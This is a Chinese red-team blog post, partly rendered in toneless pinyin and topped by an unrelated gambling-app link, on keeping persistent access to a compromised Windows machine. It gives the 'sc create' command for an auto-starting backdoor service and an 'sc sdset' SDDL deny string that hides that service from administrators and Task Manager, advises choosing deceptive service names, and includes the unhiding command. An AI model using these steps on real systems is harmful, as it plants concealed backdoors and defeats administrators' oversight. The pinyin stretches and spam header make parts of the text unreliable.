天博app下载链接

红队技巧:隐藏windows服务

2020-10-16 / 0 评论 渗透测试 / Mrxn

benwengongji 1137 zi,ganxienindenaixinliulanyupinglun.

后渗透测试中,我们拿到了目标机器的权限后,要想办法维持权限,保持持久,嗯,很重要,不管生活还是工作都需要持久!

liyongwindowsfuwulaizhiruwomendehoumenyeshiyizhongchangjiandeliyongfangshi,danshiwangwangyibanzhirudefuwuhenrongyibeiguanliyuanzairenwuguanliqikandao。ruguokeyiyinzangdehua,jiudadatigaolewomendechijiuxing,jintianjiujieshaoxiayizhongliyongpowershelllaijinxingyinzangwindowsfuwudejiqiao,zhongqihouyekeyizhengchangqidong。

shouxianchuangjianyigefuwu(xuyaoxitongguanliyuanquanxianyunxingdecmd):

sc create mrxn binPath=C:/Users/olil.cn/Desktop/mrxn.exe start=auto
sc_create.png

rushangtusuoshikeyikandaochenggongchuangjianleyigemingwei mrxn dewindowsfuwu,shizhanguochengkeyijiashangyixiemiaoshu,quyigemihuoxingdemingzidengdengcaozuomihuoduishou。

ranhouyiguanliyuanquanxiandakaiyige powershell chuangkou,yunxinganquanmiaoshufudingyiyuyan(sddl)minglinglaiyinzangwomenchuangjiande mrxn fuwu:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
hide.png

yunxingchenggonghou,zaiwomenderenwuguanliqilimianjiukanbudaochuangjiande mrxn fuwule(xuyaozhongqirenwuguanliqihuozheniminglingshuaxin)

如果你不想隐藏次windows服务了,运行以下安全描述符定义语言(SDDL)命令来取消隐藏即可:

& $env:SystemRoot\System32\sc.exe sdset mrxn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
unhide.png

如上图所示,成功取消隐藏windows服务。

这种方法对于红队来说,还是有一定作用的,欢迎渗透大佬们实践评论。

详细的原理来自这里:http://www.sans.org/blog/red-team-tactics-hiding-windows-services/ 我只是实践者。
查找隐藏的Windows服务项:

蓝队技巧:查找被隐藏的Windows服务项

标签: 攻击 渗透测试

转载:转载请注明原文链接 - 红队技巧:隐藏windows服务


0条回应:“红队技巧:隐藏windows服务”


发表评论

{view_code_no}